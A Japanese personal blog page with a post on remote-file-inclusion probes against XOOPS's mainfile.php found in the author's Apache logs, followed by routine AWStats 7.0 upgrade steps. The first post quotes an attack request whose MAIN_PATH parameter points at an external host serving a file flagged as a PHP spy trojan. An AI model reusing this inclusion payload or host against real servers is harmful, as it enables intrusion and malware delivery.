カテゴリー
XOOPS

mainfile.php狙いの不正アクセス。

 今日は,寒かった。昨日から南に見える例のお山は雪を頂いていたが,今朝は北に見える山も雪を被っていた。初雪である。まぁ,家の辺まで降ったわけではありませんが……

 ところで,12月5日にXOOPSを導入して以来,mainfile.php狙いの不正アクセスがApacheのログに多く記録されている。
mainfile.php?MAIN_PATH=http://www.all3c.com///images/mono/20100907/app/functions/response.txt?
mainfile.php?id
なんちゃらで,libwww-perlを利用したものである。自鯖にはmainfile.phpはないので,すべて404エラーになっている。@PAGESのほうではまだアクセスログを見ていないので分からないが,やっぱりmainfile.phpは有名な名前なんだね。

 MoovableTypeでも,WordPressでもコンフィグを狙うアクセスは多いけど,有名どころのアプリをそのままの名で設置するときは,指示されているセキュリティ関係のオプションはきっちりやらないと危ないよ。
Trojan-Spy.PHP.Mailar.h
 ところで,aguse.jp越えで h ttp://www.all3c.com///images/mono/20100907/app/functions/response.txt? にアクセスしたら,右の画像が表示された。カスペルスキー,えらい。

カテゴリー
everyday life

AWStats7.0へのアップグレード。

投稿アップデート情報  追記(2012/1/11)  追記2(2013/1/9)

 XOOPSのほうも気になるのだが,一昨日(7日)から忙しいのでちょっとお預けである。初体験のシステムなので,流石にもう少し気分が落ち着かないと……しんどい。
 ところで12月5日,しばらく前にベータ版の出ていたAWStats7.0が正式リリースされた。簡単に済むと思うので,先にこちらを6.95→7.0へアップグレードして見ようと思う。

【手順】

  1. awstats-7.0.zipをダウンロードする。
  2. ローカルで解凍する。
  3. httpd_confをもとにhttpd-awstats.confを作り,PATHを環境に合わせて書き換える。Apacheのconfextraに置く。       <<—— 今回はアップグレードなので,前のを使う。
  4. httpd.confをあけて,以下の2行を付け加える。
    # Awstats settings
    Include conf/extra/httpd-awstats.conf       <<—— 今回はアップグレードなので,既に済んでいる。
  5. ドキュメントルートにawstatsフォルダを作り,その中にcss,icon,classes,jsの4フォルダを移動する。
  6. httpd.confをあけて,CustomLog “logs/access.log” commonをコメントアウトし,CustomLog “logs/access.log” combinedをアンコメントする。<<—— 今回はアップグレードなので,既に済んでいる。
  7. cgi-bin下のawstats.model.confをawstats.myserverdomain.confにリネームする。
    awstats.myserverdomain.confをあけて以下のパラメータを書き直す。
    – LogFileパラメータ
    – LogTypeパラメータ
    – LogFormatパラメータ
    – DirIconsパラメータ
    – SiteDomainパラメータ
    – HostAliasesパラメータ
    – DnsLookUpパラメータ
    – AllowAccessFromWebToFollowingIPAddressesパラメータ
    – DefaultFileパラメータ

    これについては,ナンやらチョコチョコ変わっているようなので,新しいawstats.model.confを見直しながら,再設定した。

  8. awredir.pl,awstats.plの1行めを自分のサーバのperlの置き所のパスに直す。
    (#!ドライブ文字:/~/~/perl なんちゃらです。)
  9. cgi-binフォルダの内容を,そっくりサーバのcgi-binに移動する。
  10. perl awstats.pl -config=myserverdomain -update を実行。

 (注)普通はファイルのアップロードが入るのだが,自鯖で直に触っているのでそれはなし。

 前バージョンとの不整合は特にない模様。6.95のデータも問題なく使える。

追記(2012/1/11):
 AWStats7.0 を ActivePerl-5.14.2.1402-MSWin32-x86-295342.msi 上で使った時の不具合とその解決法について「本家のお世話-#21。」に書いてある。同じ不具合が起こるか,同じ解決法が役立つかどうかはわからないが,必要があれば合わせて読んでください。

追記2(2013/1/9):
 AWStats7.1へのアップデートを書いた。 patch.exe の使い方も書いてあるので,ナンだったらご覧ください。